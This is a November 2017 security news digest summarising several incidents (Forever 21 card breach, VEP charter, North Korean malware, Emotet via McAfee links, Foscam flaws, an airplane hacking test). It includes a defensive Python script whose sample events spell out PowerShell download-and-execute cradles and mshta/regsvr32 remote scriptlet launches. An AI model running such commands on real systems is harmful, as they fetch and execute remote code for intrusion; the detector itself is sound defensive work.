Forever 21 Informs Customers of a Potential Data Breach*:
- Forever 21 announced that an unidentified third party told the clothier that there may have been unauthorized access to data from payment cards that were used at certain stores.
- They began an investigation of their payment card systems, brought in a security and forensics firm to help out, and informed customers.
- The retailer doesn’t appear to know much, including whether or not anybody’s payment data were actually compromised.
- Forever 21 implemented its current encryption and tokenization solutions in 2015, but the encryption on some PoS devices in some Forever 21 stores was not in operation.
- The retailer didn’t say when the encryption was non-functional, but the investigation is focusing on card transactions that took place between March and October 2017.
- Retailers are one of the most targeted industries for malware – right up there with service, healthcare, food service, education, and hotels.
- If not protected properly, PoS systems become easy targets, and a single compromised system can expose the card data of thousands of customers.
- PoS vendors who insist on remote access to your network should be able to answer several key security questions; you should expect informative, educational answers from someone who holds the keys to your commercial kingdom.
- Please click on the link below for the full list of questions a PoS vendor should be able to answer.
*Source: Naked Security, November 16, 2017
White House Releases New Charter for Using, Disclosing Security Vulnerabilities*:
- Technology experts have been demanding greater transparency on the US government's practices for handling security vulnerabilities that it learns about.
- The Trump administration responded to those calls with a new version of the so-called Vulnerability Equities Process (VEP) governing the use and disclosure of software vulnerabilities that the NSA and other government agencies might discover.
- The VEP charter provides fresh details on the process the government uses to determine whether to notify a private company about a security flaw in its products or services or to exploit it for intelligence gathering.
- It also promised annual statistics on the number of vulnerabilities the government retains for later exploitation and the number disclosed to affected vendors.
- The US government, like many other governments worldwide, routinely stockpiles vulnerability information and exploits that it discovers so the information can be used later for surveillance and law enforcement purposes.
- Under the process, most new and unknown vulnerabilities that federal agencies might discover have to go through the VEP.
- A board comprised of representatives from ten agencies is responsible for determining whether the government should disclose the vulnerabilities to the respective technology vendors so the flaws can be patched or to restrict dissemination of the information.
- Among the factors the board will consider are how broadly an affected product is being used, how easily discoverable and exploitable a flaw might be, the impact of exploitation and how easy or not it is to mitigate.
- The goal in all cases is to strike a balance between the need to properly secure systems and the need for government to maintain an edge in cyberspace.
*Source: Dark Reading, November 15, 2017
How North Korea Is Hacking Companies and Governments*:
- The Department of Homeland Security and the FBI issued joint alerts warning about two types of malware that North Korean hackers are allegedly using against firms across industries such as aviation, finance, telecoms, and media.
- One of them, known as FALLCHILL, has likely been in use since 2016 and allows hackers to monitor and control infected computers remotely.
- The other type of malware, Volgmer, is delivered through spear phishing: users receive an apparently legitimate email containing a link that installs the malware.
- Pyongyang has repeatedly denied involvement in any international cyberattacks.
- The FBI and DHS said both types of malware are associated with HIDDEN COBRA, a term the US government uses to refer to “malicious cyber activity by the North Korean government.”
- The DHS and FBI also identified dozens of IP addresses across several countries through which they believe Volgmer attacks are being routed.
- One cybersecurity specialist noted that this “highlights the need for nations to protect their infrastructure, not just for their own sake, but also to make sure they don’t become a pawn in someone else’s war game.”
*Source: CNN Tech, November 15, 2017
Fileless Attacks Surge in 2017, Security Solutions Are Not Stopping Them*:
- Fileless attacks are on the rise and are predicted to comprise 35 percent of all attacks next year, according to the Ponemon Institute.
- A new national survey suggests that this method of cyberattack is becoming more popular, and traditional antivirus solutions are doing little to stop the trend.
- After surveying 665 IT security professionals, Ponemon found that confidence in traditional file-scanning and antivirus software has collapsed in the face of new methods of compromising PCs and networks.
- Fileless attacks avoid the traditional route of compromise, downloading and executing a malicious file on the victim's system, precisely because such files are what security products are built to detect.
- Instead, these attacks leverage exploits or launch scripts directly in memory, which can infect endpoints while leaving little or no trace on disk.
- 70 percent of those surveyed said that the security risk to their organization has increased in the past 12 months.
- The survey results estimate that 29 percent of attacks the enterprise faced this year were fileless, up from 20 percent the year before, and this share is expected to rise to 35 percent in 2018.
- Lack of adequate protection was cited as the top concern with current enterprise endpoint security solutions.
- High numbers of false-positive alerts, as well as deployment & management complexity, were also considered problems that impact on security and productivity.
- Respondents believe the average cost of a successful attack is over $5 million, and when attackers manage to get through endpoint security, the amount of damage caused equates to roughly $300 per employee.
- The average enterprise company utilizes around seven types of different endpoint solutions, which can make management difficult.
- Endpoint security is undergoing a shift as traditional security systems are no longer enough in the face of fileless attacks, sophisticated ransomware, phishing campaigns, and compromise through supply chains.
*Source: ZD Net, November 15, 2017
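The fileless tradecraft described above (scripts launched in memory, nothing dropped to disk) still leaves a trace in process-creation telemetry: an Office application spawning a script host, a hidden-window PowerShell with a download cradle, an encoded command, or a signed binary fetching a remote scriptlet. The following is an added example written for this digest, not code from the ZDNet article or the Ponemon survey; the log field names, the scoring weights, the threshold and the sample events are all constructed assumptions, and the IP addresses are documentation ranges, not real indicators.

```python
"""Added example: score process-creation events for fileless-attack tradecraft.

Constructed for this digest. Field names (parent, image, cmdline), weights,
threshold and sample events are assumptions, not from any vendor's product.
"""
import base64
import binascii
import re

# Signed Windows binaries commonly abused to run code without writing a file.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "msbuild.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WMI_PARENTS = {"wmiprvse.exe"}

# PowerShell accepts abbreviated flags, so match -e, -ec, -enc and the full form.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# (reason, pattern, weight): each pattern counts once per event.
CRADLE_PATTERNS = [
    ("download cradle",
     re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|\bcurl\b|\bwget\b", re.I), 3),
    ("in-memory execution",
     re.compile(r"\biex\b|invoke-expression|frombase64string|reflection\.assembly", re.I), 3),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("profile/policy evasion",
     re.compile(r"-nop\b|-noprofile|-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1),
    ("remote scriptlet/HTA via signed binary",
     re.compile(r"/i:https?://|https?://\S+\.(?:sct|hta)\b|\bscript:https?://", re.I), 5),
]


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None  # flag present but payload is not valid base64
    return raw.decode("utf-16le", errors="replace")


def score_event(event):
    """Score one process-creation event. Returns (score, [reasons])."""
    image, parent = event["image"].lower(), event["parent"].lower()
    cmdline = event["cmdline"]
    score, reasons = 0, []
    if image in SCRIPT_HOSTS and parent in OFFICE_PARENTS:
        score += 4
        reasons.append(f"Office process {parent} spawned {image}")
    if image in SCRIPT_HOSTS and parent in WMI_PARENTS:
        score += 3
        reasons.append(f"{image} spawned via WMI")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score += 2
        reasons.append("encoded command decoded")
    # Strip the base64 blob so patterns run on the visible flags plus decoded text.
    text = ENC_FLAG.sub("<encoded>", cmdline)
    if decoded is not None:
        text += "\n" + decoded
    for reason, pattern, weight in CRADLE_PATTERNS:
        if pattern.search(text):
            score += weight
            reasons.append(reason)
    return score, reasons


def find_fileless_activity(events, threshold=5):
    """Return [(event, score, reasons)] for events at or above the threshold."""
    hits = []
    for ev in events:
        s, r = score_event(ev)
        if s >= threshold:
            hits.append((ev, s, r))
    return hits


# Constructed sample telemetry (not real logs). The encoded payload is built here
# exactly as PowerShell expects it: base64 over the UTF-16LE bytes of the script.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.7/a.ps1')\""},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NonInteractive -EncodedCommand " + ENCODED},
    {"parent": "wmiprvse.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe javascript:a=GetObject('script:http://203.0.113.9/p.sct').Exec();close();"},
    {"parent": "explorer.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://203.0.113.4/x.sct scrobj.dll"},
    {"parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for ev, s, r in find_fileless_activity(SAMPLE_EVENTS):
        print(f"{s:>2}  {ev['parent']} -> {ev['image']}: {', '.join(r)}")
```

The scoring deliberately combines weak signals (a hidden window, a bypassed execution policy) with strong ones (a download cradle, a remote scriptlet fetched by a signed binary) so that a lone `-w hidden` does not page anyone while `WINWORD.EXE` launching a cradle does. The encoded-command path matters because the visible command line of an `-EncodedCommand` launch contains none of the cradle keywords; only the decoded UTF-16LE text does.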
74% Of CISOs Say Cybersecurity Hinders Productivity & Innovation*:
- Vanson Bourne conducted a survey of 500 CISOs from large enterprises in the US, UK and Germany, and the main finding was that IT security is hindering productivity and innovation across enterprises.
- A whopping 88 percent of enterprises block users from certain websites and applications due to security concerns, while 94 percent are investing in web proxy services to restrict what users can and can't access.
- These restrictions do come with implications as 74 percent of CISOs said users have expressed frustration that security is preventing them from doing their job.
- As a result, IT help desks are spending an average of 572 hours a year responding to user requests and complaints regarding access to websites.
- 77 percent of CISOs say they feel stuck in a ‘catch-22’ where they’re caught between letting people work freely and keeping the enterprise safe.
- Traditional approaches to security are leading to frustrated users, unhappy CISOs, and strained relationships between workers and IT departments – all of which stifles business development, innovation, and growth.
- Application isolation could let end users click with confidence, while also keeping the organization safe.
- Application isolation runs the activities cybercriminals most often target (downloading files, using applications, browsing the internet) inside micro virtual machines, so any malware encountered is confined to that disposable VM instead of reaching the host or the network.
- This approach would allow users, IT, and security to work together to gather threat intelligence that protects the business at large.
*Source: Security Brief, October 23, 2017
Security Vulnerability In IoT Cameras Could Allow Remote Control By Hackers*:
- Newly uncovered vulnerabilities in a popular brand of indoor internet-connected cameras could be exploited by attackers in order to gain complete control of the device.
- Security issues with the Foscam C1 Indoor HD Camera could allow hackers to remotely access the device, according to researchers.
- The Foscam C1 camera is a commonly used home-monitoring device and is sold by a number of large technology retailers.
- Issues were found in the webService DDNS client (code execution), the firmware upgrade process, the softAP configuration and device-to-device communications, along with several buffer overflow vulnerabilities.
- Researchers also found that the camera's firmware upgrade process could be abused through the web management interface present on the device.
- A separate vulnerability also exists in the web management interface itself.
- Foscam Indoor IP Camera C1 Series models running the specific system firmware, application firmware and plug-in versions identified by the researchers are all susceptible to the vulnerabilities.
- Cisco has already informed Foscam of the vulnerabilities and the camera manufacturer has released a firmware update to resolve the issue.
- Users of affected devices should update to the new version as quickly as possible to ensure their devices are not vulnerable.
*Source: ZD Net, November 14, 2017
McAfee's Own Anti-Hacking Service Exposed Users to Banking Malware*:
- Security firm McAfee has blocked access to malware that was being served through a link on one of the company's own domains.
- The malware was hosted on a third-party website but was shared via a domain associated with McAfee ClickProtect, an email protection service.
- The service is meant to protect against phishing attacks, malware from links in emails, and prevent users from visiting sites that are known to be high risk.
- The link redirected users through the “cp.mcafee.com” domain and on to a malicious Word document.
- Anyone who downloaded and opened the malicious Word document would've been exposed to the Emotet banking malware.
- Once installed, the malware phones home to its command and control server and siphons off sensitive data such as browser and mail passwords, which could be used to hijack accounts and transfer funds.
- The malware connects to the command and control server using hard-coded IP addresses, but routes through proxies to evade detection.
- McAfee was “still working to establish the exact timeline” of events, a spokesperson said.
- Hackers have ramped up their use of the Emotet malware in recent months, and they’re increasingly resorting to sending carefully crafted emails and employing social engineering techniques.
- Users should be wary of shortened or rewritten links, and perhaps even more so when such links carry an implied assurance that they are safe.
*Source: ZD Net, November 15, 2017
Could Terrorists Hack an Airplane? The Government Just Did*:
- A team of cyber experts at the Department of Homeland Security successfully hacked into the avionics of a commercial airplane parked at an airport as part of a test.
- The problem is that nobody with knowledge of aviation cyber security is sure how vulnerable airplanes are to such an attack – some believe the DHS test has simply added to the confusion and created needless alarm.
- A Boeing spokesman reported that, “we witnessed the test and can say unequivocally that there was no hack of the airplane’s flight control systems.”
- There is a strong feeling among hacking experts that the full extent of the threat will remain underestimated.
- While the avionics in the latest generation of jets are designed with protections against hacking, 90 percent of commercial jets still flying lack those protections because the age of their systems prohibits upgrades.
- One researcher noted that “manufacturers and airlines don’t let researchers, even with honest intentions, get access to find a very expensive problem.”
- The exact purpose and scope of the tests performed by DHS have not been made clear, but attacking an airplane in the air is more challenging than attacking fixed infrastructure.
- An airplane’s satellite communications or other radio links could be leveraged to launch attacks, and the use of potentially vulnerable satellite communication channels has increased significantly in the last five years.
- This raises what is potentially the gravest threat posed by hacking: in effect, the possibility of remotely hijacking the controls from the pilots.
- For years, independent researchers have pointed out that the testing of avionics systems by manufacturers is confined to looking for technical flaws, not for vulnerabilities to hacking.
- The computers running an airplane’s flight controls are programmed to detect if data fed to them is anomalous and, if it is, to shut down so that the pilots can fly the airplane manually.
- No crew has yet had to grapple with the consequences of their flight control protections being breached by a hacker, nor is there any training program to prepare them for that.
- The use of hacking to attack aviation is another instance of the increasing spread of asymmetric warfare.
*Source: The Daily Beast, November 17, 2017